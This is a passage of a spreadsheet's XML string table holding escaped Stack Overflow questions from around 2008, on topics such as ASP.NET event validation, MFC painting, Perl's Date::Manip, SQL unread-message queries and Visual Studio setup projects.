  Stack trace: at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) at System.Web.UI.ClientScriptManager.EnsureEventValidationFieldLoaded() at System.Web.UI.ClientScriptManager.ValidateEvent(String uniqueId, String argument) at System.Web.UI.Control.ValidateEvent(String uniqueID, String eventArgument) at System.Web.UI.WebControls.DropDownList.LoadPostData(String postDataKey, NameValueCollection postCollection) at System.Web.UI.WebControls.DropDownList.System.Web.UI.IPostBackDataHandler.LoadPostData(String postDataKey, NameValueCollection postCollection) at System.Web.UI.Page.ProcessPostData(NameValueCollection postData, Boolean fBeforeLoad) at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I send an SMTP Message from Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/46663/how-do-you-send-email-from-a-java-app-using-gmail"&gt;How do you send email from a Java app using Gmail?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do I send an SMTP Message from Java?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a console for Windows Mobile devices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to write small console based applications on Windows Mobile.  What console applications might I use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linux desktop shortcut and icon from install</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What do I need to add to my &lt;code&gt;.spec&lt;/code&gt; file to create the desktop shortcut and assign an icon to the shortcut during install of my &lt;code&gt;.rpm&lt;/code&gt;?  If a script is required, an example would be very helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Combine PDFs c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I combine multiple PDFs into one PDF without a 3rd party component?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dropdownlist width in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In IE, the dropdown-list takes the same width as the dropbox (I hope I am making sense) whereas in Firefox the dropdown-list's width varies according to the content. &lt;/p&gt;
&lt;p&gt;This basically means that I have to make sure that the dropbox is wide enough to display the longest selection possible. This makes my page look very ugly :(&lt;/p&gt;
&lt;p&gt;Is there any workaround for this problem? 
How can I use CSS to set different widths for dropbox and the dropdownlist?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between explicit and implicit cursors in Oracle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a bit rusty on my cursor lingo in PL/SQL. Anyone know this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generate thumbnail with white border</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to generate thumbnails from a set of jpg's that need to have a small white border so that they appear to be "photos" when displayed on a map. Getting the thumbnails themselves is easy but I can't figure out how to get the border.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you have more than one ASP.NET State Server Service in a cluster?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a 4 server cluster running ASP.NET web application using ASP.NET State Server Service for session. On one of the 4 servers ASP.NET State Server Service is running and other servers are configured to look at this. Very often we have to patch the servers, and applying patch on the State Server requires few minutes of downtime. &lt;/p&gt;
&lt;p&gt;Is there a way to configure more than two ASP.NET State Server Services in a cluster, so if one goes down, the other takes over?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to fix an MFC Painting Glitch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement some drag and drop functionality for a material system being developed at my work. Part of this system includes a 'Material Library' which acts as a repository, divided into groups, of saved materials on the user's hard drive.&lt;/p&gt;
&lt;p&gt;As part of some UI polish, I was hoping to implement a 'highlight' type feature. When dragging and dropping, windows that you can legally drop a material onto will very subtly change color to improve feedback to the user that this is a valid action.&lt;/p&gt;
&lt;p&gt;In the included screenshot, I am changing the bar with 'Basic Materials' (Just a CWnd with a CStatic) from having a medium gray background when unhighlighed to a blue background when hovered over. It all works well, the OnDragEnter and OnDragExit messages seem robust and set a flag indicating the highlight status. Then in OnCtrlColor I do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    if (!m_bHighlighted) {
	pDC-&amp;gt;FillSolidRect(0, 0, m_SizeX, kGroupHeaderHeight, kBackgroundColour);
}
else {
	pDC-&amp;gt;FillSolidRect(0, 0, m_SizeX, kGroupHeaderHeight, kHighlightedBackgroundColour);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src="http://www.aliparr.net/badmfcpaint.jpg" alt="Material Library Badness" /&gt;&lt;/p&gt;
&lt;p&gt;However, as you can see in the screenshot, the painting 'glitches' below the dragged object, leaving the original gray in place. It looks really ugly and basically spoils the whole effect.&lt;/p&gt;
&lt;p&gt;Is there any way I can get around this? MFC isn't fun at the best of times, and this is causing me to tear my hair out.&lt;/p&gt;
&lt;p&gt;All help gratefully appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Random in python 2.5 not working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use the &lt;code&gt;import random&lt;/code&gt; statement in python, but it doesn't appear to have any methods in it to use.&lt;/p&gt;
&lt;p&gt;Am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VisualSVN Server wants a username and password</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've renamed my server and am trying to get to the VisualSVN Server repository via TortoiseSVN. In &lt;a href="http://stackoverflow.com/questions/69646/svn-and-renaming-the-server-its-running-on"&gt;this post&lt;/a&gt; Gordon helped me find the right command - thanks Gordon.&lt;/p&gt;
&lt;p&gt;Now VisualSVN Server is asking me for a username and password. I don't recall setting one and if I did I've forgotten it. Any idea how to reset this username / password?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS : Bad Gray Line to the side of the Navigation Bar on http://perl-begin.org/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm maintaining &lt;a href="http://perl-begin.org/" rel="nofollow"&gt;the Perl Beginners' Site&lt;/a&gt; and used a modified template from Open Source Web Designs. Now, the problem is that I still have an undesired artifact: a gray line on the left side of the main frame, to the left of the navigation menu. Here's &lt;a href="http://www.shlomifish.org/Files/files/images/Computer/Screenshots/perl-begin-bad-artif.png" rel="nofollow"&gt;an image&lt;/a&gt; highlighting the undesired effect.&lt;/p&gt;
&lt;p&gt;How can I fix the CSS to remedy this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Date.getTime() not including time?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can't understand why the following takes place:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String date = "06-04-2007 07:05";
SimpleDateFormat fmt = new SimpleDateFormat("MM-dd-yyyy HH:mm");
Date myDate = fmt.parse(date); 
System.out.println(myDate);  //Mon Jun 04 07:05:00 EDT 2007
long timestamp = myDate.getTime();
System.out.println(timestamp); //1180955100000 -- where are the milliseconds?
// on the other hand...
myDate = new Date();
System.out.println(myDate);  //Tue Sep 16 13:02:44 EDT 2008
timestamp = myDate.getTime();
System.out.println(timestamp); //1221584564703 -- why, oh, why?
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I store the window size between sessions in Qt?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a QMainWindow in a Qt application. When I close it I want it to store its current restore size (the size of the window when it is not maximized). This works well when I close the window in restore mode (that is, not maximized). But if I close the window if it is maximized, then next time i start the application and restore the application (because it starts in maximized mode), then it does not remember the size it should restore to. Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>is there a way for my binary to react to some global hotkeys in linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to listen for a certain hotkey ( e.g:&lt;kbd&gt;Ctrl&lt;/kbd&gt;&lt;kbd&gt;-&lt;/kbd&gt;&lt;kbd&gt;I&lt;/kbd&gt; ) and then perform a specific action ? My application is written in C , will only run on Linux , and it doesn't have a GUI . Are there any libraries that help with this kind of task ?&lt;/p&gt;
&lt;p&gt;EDIT:as an example,amarok has global shortcuts , so for example if you map a combination of keys to an action ( let's say &lt;kbd&gt;Ctrl&lt;/kbd&gt;&lt;kbd&gt;-&lt;/kbd&gt;&lt;kbd&gt;+&lt;/kbd&gt; , &lt;kbd&gt;Ctrl&lt;/kbd&gt; and &lt;kbd&gt;+&lt;/kbd&gt; ) you could execute that action when you press the keys . If I would map &lt;kbd&gt;Ctrl&lt;/kbd&gt;&lt;kbd&gt;-&lt;/kbd&gt;&lt;kbd&gt;+&lt;/kbd&gt; to the volume increase action , each time I press &lt;kbd&gt;ctrl&lt;/kbd&gt;&lt;kbd&gt;-&lt;/kbd&gt;&lt;kbd&gt;+&lt;/kbd&gt; the volume would increase by a certain amount .&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delegating a task in and getting notified when it completes (in C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Conceptually, I would like to accomplish the following but have had trouble understand how to code it properly in C#:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
SomeMethod { // Member of AClass{}
    DoSomething;
    Start WorkerMethod() from BClass in another thread;
    DoSomethingElse;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, when WorkerMethod() is complete, run this:&lt;/p&gt;
&lt;p&gt;&lt;pre&gt;&lt;code&gt;
void SomeOtherMethod()  // Also member of AClass{}
{ ... }
&lt;/pre&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Can anyone please give an example of that? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add a namespace reference to a SOAP response with Apache Axis2 and WSDL2Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking at the SOAP output from a web service I'm developing, and I noticed something curious:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;soapenv:Envelope xmlns:soapenv="http://www.w3.org/2003/05/soap-envelope"&amp;gt;
   &amp;lt;soapenv:Body&amp;gt;
      &amp;lt;ns1:CreateEntityTypesResponse xmlns:ns1="http://somedomain.com/wsinterface"&amp;gt;
         &amp;lt;newKeys&amp;gt;
            &amp;lt;value&amp;gt;1234&amp;lt;/value&amp;gt;
         &amp;lt;/newKeys&amp;gt;
         &amp;lt;newKeys&amp;gt;
            &amp;lt;value&amp;gt;2345&amp;lt;/value&amp;gt;
         &amp;lt;/newKeys&amp;gt;
         &amp;lt;newKeys&amp;gt;
            &amp;lt;value&amp;gt;3456&amp;lt;/value&amp;gt;
         &amp;lt;/newKeys&amp;gt;
         &amp;lt;newKeys xsi:nil="1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/&amp;gt;
         &amp;lt;newKeys xsi:nil="1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/&amp;gt;
         &amp;lt;errors&amp;gt;Error1&amp;lt;/errors&amp;gt;
         &amp;lt;errors&amp;gt;Error2&amp;lt;/errors&amp;gt;
      &amp;lt;/ns1:CreateEntityTypesResponse&amp;gt;
   &amp;lt;/soapenv:Body&amp;gt;
&amp;lt;/soapenv:Envelope&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have two newKeys elements that are nil, and both elements insert a namespace reference for xsi.  I'd like to include that namespace in the soapenv:Envelope element so that the namespace reference is only sent once.&lt;/p&gt;
&lt;p&gt;I am using WSDL2Java to generate the service skeleton, so I don't directly have access to the Axis2 API.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display a dynamically allocated array in the Visual Studio debugger?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you have a statically allocated array, the Visual Studio debugger can easily display all of the array elements.  However, if you have an array allocated dynamically and pointed to by a pointer, it will only display the first element of the array when you click the + to expand it.  Is there an easy way to tell the debugger, show me this data as an array of type Foo and size X?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you quickly find the URL for a Win32 API on MSDN?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you quickly find the URL for a Win32 API on MSDN?  It's easy for .NET methods -- just add the method name (for example, System.Byte.ToString) to &lt;a href="http://msdn.microsoft.com/library/" rel="nofollow"&gt;http://msdn.microsoft.com/library/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, for Win32 APIs (say GetLongPathName), this doesn't work: &lt;a href="http://msdn.microsoft.com/en-us/library/GetLongPathName" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/GetLongPathName&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I want to be able to use the URL in code comments or documentation.  So the URL one gets with an MSDN or Google search (for example, &lt;a href="http://msdn.microsoft.com/library/aa364980.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/library/aa364980.aspx&lt;/a&gt;) isn't really what I'm looking for.  I'd really like my code comments to look something like:&lt;/p&gt;
&lt;p&gt;// blah blah blah.  See &lt;a href="http://msdn.microsoft.com/en-us/library/GetLongPathName" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/GetLongPathName&lt;/a&gt; for more information.&lt;/p&gt;
&lt;p&gt;What's the magic pixie dust for Win32 APIs?  Or does it only work for .NET methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open Source Database Plugin For Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a good open source plugin for database querying and exploring within Eclipse? &lt;/p&gt;
&lt;p&gt;The active Database Exploring plugin within Eclipse is really geared around being associated with a Java project. While I am just trying to run ad-hoc queries and explore the schema. I am effectively looking for a just a common, quick querying tool without the overhead of having to create a code project. I have found a couple open source database plugins for Eclipse but these have not seen active development in over a year.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XSLT processing in/from ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend an efficient method to execute XSLT transforms of XML data within a Ruby application? The XSL gem (REXSL) is not available yet, and while I have seen a project or two that implement it, I'm wary of using them so early on. A friend had recommended a shell out call to Perl, but I'm worried about resources. &lt;/p&gt;
&lt;p&gt;This is for a linux environment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate to not cache a property</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I configure NHibernate to not cache a file?&lt;br&gt;
I know I can create a method that does an HSQL, but can I through a configuration setting in the &amp;lt;class&gt;.xml file or the hibernate xml file itself to not cache a property?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the name of a python class as a string?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What method do I call to get the name of a class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to convert pdf files to tiff files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have around 1000 pdf filesand I need to convert them to 300 dpi tiff files. What is the best way to do this? If there is an SDK or something or a tool that can be scripted that would be ideal. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to do Visual Studio post build deployment in a team environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working in a team environment where each developer works from their local desktop and deploys to a virtual machine that they own on the network.  What I'm trying to do is set up the Visual Studio solution so that when they build the solution each projects deployment is handled in the post-build event to that developers virtual machine.&lt;/p&gt;
&lt;p&gt;What I'd really like to do is give ownership of those scripts to the individual developer as well so that they own their post build steps and they don't have to be the same for everyone.&lt;/p&gt;
&lt;p&gt;A couple of questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is a post build event the place to execute this type of deployment operation?  If not what is the best place to do it?&lt;/li&gt;
&lt;li&gt;What software, tools, or tutorials/blog posts are available to assist in developing an automatic deployment system that supports these scenarios?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; MSBuild seems to be the way to go in this situation.  Anyone use alternative technologies with any success?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; If you are reading this question and wondering how to execute a different set of MSBuild tasks for each developer please see this question; &lt;a href="http://stackoverflow.com/questions/78018/executing-different-set-of-msbuild-tasks-for-each-user"&gt;Executing different set of MSBuild tasks for each user?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JPA Multiple Transaction Managers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have one applicationContext.xml file, and it has two org.springframework.orm.jpa.JpaTransactionManager (each with its own persistence unit, different databases) configured in a Spring middleware custom application.
&lt;br&gt;&lt;br&gt;I want to use annotation based transactions (@Transactional), to not mess around with TransactionStatus commit, save, and rollback.&lt;br&gt;&lt;br&gt;
A coworker mentioned that something gets confused doing this when there are multiple transaction managers, even though the context file is set configured correctly (the references go to the correct persistence unit.
Anyone ever see an issue?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;In your config, would you have two transaction managers?
Would you have txManager1 and txManager2?&lt;br&gt;&lt;br&gt;
That's what I have with JPA, two different Spring beans that are transaction managers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When are you supposed to use escape instead of encodeURI / encodeURIComponent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When encoding a query string to be sent to a web server - when do you use &lt;code&gt;escape()&lt;/code&gt; and when do you use &lt;code&gt;encodeURI()&lt;/code&gt; or &lt;code&gt;encodeURIComponent()&lt;/code&gt;:&lt;/p&gt;
&lt;p&gt;Use escape:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;escape("% +&amp;amp;=");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;OR&lt;/p&gt;
&lt;p&gt;use encodeURI() / encodeURIComponent()&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;encodeURI("http://www.google.com?var1=value1&amp;amp;var2=value2");
encodeURIComponent("var1=value1&amp;amp;var2=value2");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you reliably get the Quick Launch folder in XP and Vista?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We need to reliably get the Quick Launch folder for both All and Current users under both Vista and XP.  I'm developing in C++, but this is probably more of a general Windows API question.&lt;/p&gt;
&lt;p&gt;For reference, here is code to get the Application Data folder under both systems:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	HRESULT hres; 
	CString basePath;
	hres = SHGetSpecialFolderPath(this-&amp;gt;GetSafeHwnd(), basePath.GetBuffer(MAX_PATH), CSIDL_APPDATA, FALSE);
	basePath.ReleaseBuffer();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I suspect this is just a matter of knowing which sub-folder Microsoft uses.&lt;/p&gt;
&lt;p&gt;Under Windows XP, the app data subfolder is:&lt;/p&gt;
&lt;p&gt;Microsoft\Internet Explorer\Quick Launch&lt;/p&gt;
&lt;p&gt;Under Vista, it appears that the sub-folder has been changed to:&lt;/p&gt;
&lt;p&gt;Roaming\Microsoft\Internet Explorer\Quick Launch&lt;/p&gt;
&lt;p&gt;but I'd like to make sure that this is the correct way to determine the correct location.&lt;/p&gt;
&lt;p&gt;Finding the &lt;em&gt;correct&lt;/em&gt; way to determine this location is quite important, as relying on hard coded folder names almost always breaks as you move into international installs, etc...  The fact that the folder is named 'Roaming' in Vista makes me wonder if there is some special handling related to that folder (akin to the Local Settings folder under XP).&lt;/p&gt;
&lt;p&gt;EDIT:
The following msdn article:  &lt;a href="http://msdn.microsoft.com/en-us/library/bb762494.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/bb762494.aspx&lt;/a&gt; indicates that CSIDL_APPDATA has an equivalent ID of FOLDERID_RoamingAppData, which does seem to support StocksR's assertion that CSIDL_APPDATA does return C:\Users\xxxx\AppData\Roaming, so it should be possible to use the same relative path for CSIDL_APPDATA to get to quick launch (\Microsoft\Internet Explorer\Quick Launch).&lt;/p&gt;
&lt;p&gt;So the following algorithm is correct per MS:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HRESULT hres; 
CString basePath;
hres = SHGetSpecialFolderPath(this-&amp;gt;GetSafeHwnd(), basePath.GetBuffer(MAX_PATH), CSIDL_APPDATA, FALSE);
basePath.ReleaseBuffer();
CString qlPath = basePath + "\\Microsoft\\Internet Explorer\\Quick Launch";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it would also be a good idea to check hres to ensure that the call to SHGetSpecialFolderPath was successful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Production, Test, Developer Environments vs Security</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are current practices for enabling developers to build systems that contain private data? Can anyone point to a "best practices" guide for that sort of thing?&lt;/p&gt;
&lt;p&gt;We have a Catch-22 here in that developers need to write applications that go against systems that have data that is considered "private." The IT administration would like for us developers to not have access to the data (ie. provide a schema or data structure, but not data itself) whereas most developers (myself included) would like to have access to the production data since not having a representative dataset can lead to bad assumptions (eg. the format of data) and bugs later on.&lt;/p&gt;
&lt;p&gt;Does anyone have any formalized "best practices" for this type of thing? Especially official guildines from some "BigCo" (eg. Microsoft, IBM) might help since it is needed to convince management.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to return variables from a syncExec?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my SWT Java app I often want to return information from inside a Display.syncExec() call.  The best way I've found so far to do this is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;final ArrayList&amp;lt;Integer&amp;gt; result = new ArrayList&amp;lt;Integer&amp;gt;();
GUI.display().syncExec(new Runnable(){ public void run() {
   MessageBox mb = /* ... */;
    /* set up messagebox */
   result.add(mb.open());
}});
if (SWT.OK == result.get(0)) { /* ... */ }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I think this is allowed because ArrayList is thread-safe, but is there a better container I should be using, or an easier way altogether?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free/cheap PowerDesigner alternative?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using PowerDesigner at work for database modelling. But there is a hell of a price tag on that piece of software. And frankly, all I use is physical diagrams for MS SQL, which is about 1% of what PD knows.&lt;/p&gt;
&lt;p&gt;Are there any good alternatives? I know about Visio and MS SQL Diagrams, but looking for other options.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extreme Programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As developers and as professional engineers have you been exposed to the tenants of Extreme Programming as defined in the "version 1" by Kent Beck.
Which of those 12 core principles do you feel you have been either allowed to practice or at least be a part of in your current job or others?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;* Pair programming[5]
* Planning game
* Test driven development
* Whole team (being empowered to deliver)
* Continuous integration
* Refactoring or design improvement
* Small releases
* Coding standards
* Collective code ownership
* Simple design
* System metaphor
* Sustainable pace
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From an engineers point of view I feel that the main engineering principles of XP arevastly superior to anything else I have been involved in. What is your opinion?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Perl: Use of uninitialized value in numeric lt (&lt;) at /Date/Manip.pm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This has me puzzled. This code worked on another server, but it's failing on Perl v5.8.8 with &lt;a href="http://search.cpan.org/dist/Date-Manip" rel="nofollow"&gt;Date::Manip&lt;/a&gt; loaded from CPAN today.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Warning:
Use of uninitialized value in numeric lt (&amp;lt;) at /home/downside/lib/Date/Manip.pm line 3327.
at dailyupdate.pl line 13
        main::__ANON__('Use of uninitialized value in numeric lt (&amp;lt;) at
/home/downsid...') called at
/home/downside/lib/Date/Manip.pm line 3327
        Date::Manip::Date_SecsSince1970GMT(09, 16, 2008, 00, 21, 22) called at
/home/downside/lib/Date/Manip.pm line 1905
        Date::Manip::UnixDate('today', '%Y-%m-%d') called at
TICKER/SYMBOLS/updatesymbols.pm line 122
        TICKER::SYMBOLS::updatesymbols::getdate() called at
TICKER/SYMBOLS/updatesymbols.pm line 439
        TICKER::SYMBOLS::updatesymbols::updatesymbol('DBI::db=HASH(0x87fcc34)',
'TICKER::SYMBOLS::symbol=HASH(0x8a43540)') called at
TICKER/SYMBOLS/updatesymbols.pm line 565
TICKER::SYMBOLS::updatesymbols::updatesymbols('DBI::db=HASH(0x87fcc34)', 1, 0, -1) called at
dailyupdate.pl line 149
        EDGAR::updatesymbols('DBI::db=HASH(0x87fcc34)', 1, 0, -1) called at
dailyupdate.pl line 180
        EDGAR::dailyupdate() called at dailyupdate.pl line 193
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The code that's failing is simply:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sub getdate()
{    my $err;                ## today
    &amp;amp;Date::Manip::Date_Init('TZ=EST5EDT');       
    my $today = Date::Manip::UnixDate('today','%Y-%m-%d'); ## today's date
    ####print "Today is ",$today,"\n";        ## ***TEMP***
    return($today);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That's right; &lt;a href="http://search.cpan.org/dist/Date-Manip" rel="nofollow"&gt;Date::Manip&lt;/a&gt; is failing for &lt;code&gt;"today"&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The line in &lt;a href="http://search.cpan.org/dist/Date-Manip" rel="nofollow"&gt;Date::Manip&lt;/a&gt; that is failing is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  my($tz)=$Cnf{"ConvTZ"};  
  $tz=$Cnf{"TZ"}  if (! $tz);  
  $tz=$Zone{"n2o"}{lc($tz)}  if ($tz !~ /^[+-]\d{4}$/);  
  my($tzs)=1;  
  $tzs=-1 if ($tz&amp;lt;0); ### ERROR OCCURS HERE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So &lt;a href="http://search.cpan.org/dist/Date-Manip" rel="nofollow"&gt;Date::Manip&lt;/a&gt; is assuming that &lt;code&gt;$Cnf&lt;/code&gt; has been initialized with elements &lt;code&gt;"ConvTZ"&lt;/code&gt; or &lt;code&gt;"TZ"&lt;/code&gt;.  Those are initialized in &lt;code&gt;Date_Init&lt;/code&gt;, so that should have been taken care of.&lt;/p&gt;
&lt;p&gt;It's only failing in my large program.  If I just extract "&lt;code&gt;getdate()&lt;/code&gt;" above
and run it standalone, there's no error.  So there's something about the
global environment that affects this.&lt;/p&gt;
&lt;p&gt;This seems to be a known, but not understood problem.  If you search Google for
"Use of uninitialized value date manip" there are about 2400 hits.
This error has been reported with &lt;a href="http://www.lemis.com/grog/videorecorder/mythsetup-sep-2006.html" rel="nofollow"&gt;MythTV&lt;/a&gt; and &lt;a href="http://www.cpan.org/modules/by-module/Mail/grepmail-4.51.readme" rel="nofollow"&gt;grepmail&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fetch unread messages, by user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to maintain a list of global messages that will be displayed to all users of a web app. I want each user to be able to mark these messages as read individually. I've created 2 tables; &lt;code&gt;messages (id, body)&lt;/code&gt; and &lt;code&gt;messages_read (user_id, message_id)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Can you provide an sql statement that selects the unread messages for a single user? Or do you have any suggestions for a better way to handle this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a simple method to dump pipe input to a file? (Linux)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a little shell script that will take anything piped into it, and dump it to a file.. for email debugging purposes. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2008 Setup Project: Shared (By All Users) Application Data Files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;fellow anthropoids and lily pads and paddlewheels!&lt;/p&gt;
&lt;p&gt;I'm developing a Windows desktop app in C#/.NET/WPF, using VS 2008. The app is required to install and run on Vista and XP machines. I'm working on a Setup/Windows Installer Project to install the app.&lt;/p&gt;
&lt;p&gt;My app requires read/modify/write access to a SQLCE database file (.sdf) and some other database-type files related to a third-party control I'm using. These files should be shared among all users/log-ins on the PC, none of which can be required to be an Administrator. This means, of course, that the files can't go in the program's own installation directory (as such things often did before the arrival of Vista, yes, yes!).&lt;/p&gt;
&lt;p&gt;I had expected the solution to be simple. &lt;strong&gt;Vista and XP both have shared-application-data folders intended for this purpose.&lt;/strong&gt; ("\ProgramData" in Vista, "\Documents and Settings\All Users\Application Data" in XP.) The .NET Environment.GetFolderPath(SpecialFolder.CommonApplicationData) call exists to find the paths to these folders on a given PC, yes, yes!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;But I can't figure out how to specify the shared-application-data folder as a target in the Setup project.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The Setup project offers a "Common Files" folder, but that's intended for shared program components (not data files), is usually located under "\Program Files," and has the same security restrictions anything else in "\Program files" does, yes, yes!&lt;/p&gt;
&lt;p&gt;The Setup project offers a "User's Application Data" folder, but that's a per-user folder, which is exactly what I'm trying to avoid, yes, yes!&lt;/p&gt;
&lt;p&gt;Is it possible to add files to the shared-app-data folder in a robust, cross-Windows-version way from a VS 2008 setup project? Can anyone tell me how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to dynamically load a properties file in NAnt?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to load a different properties file based upon one variable.&lt;/p&gt;
